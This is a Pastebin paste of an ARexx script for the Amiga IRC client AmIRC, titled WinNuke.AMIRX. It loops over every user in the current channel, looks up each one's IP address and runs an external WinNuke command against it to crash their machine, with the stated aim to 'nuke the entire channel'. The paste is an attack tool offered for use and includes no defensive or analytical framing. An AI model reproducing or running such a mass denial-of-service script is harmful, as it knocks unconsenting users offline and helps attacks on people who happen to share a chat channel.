Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- WinNuke.AMIRX
- By Marcus Johansson, Polarn - #AmigaSWE
- Put this in the rexx/ drawer of you AmIRC drawer.
- Use '/rx nuke' to nuke the entire channel! :)
- And dont forget to have the WinNuke cmd in C:
- */
- parse arg args
- options results
- ops = ""
- getmynick
- mynick = RESULT
- getchannel
- channel = RESULT
- namevalid = 0
- count = 0
- do while namevalid = 0
- getuserstate count
- if rc = 5 then break
- getuser count
- nick = RESULT
- USERHOST nick
- host=RESULT
- parse var host shit'@'ip
- address command "run >nil: c:winnuke "ip
- 'echo P='d2c(27)'b«WinNuke» Nuked: 'nick' - 'ip
- nicks = nicks nick
- count = count + 1
- end
- 'echo P='d2c(27)'b«WinNuke» Nuked: 'strip(nicks)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement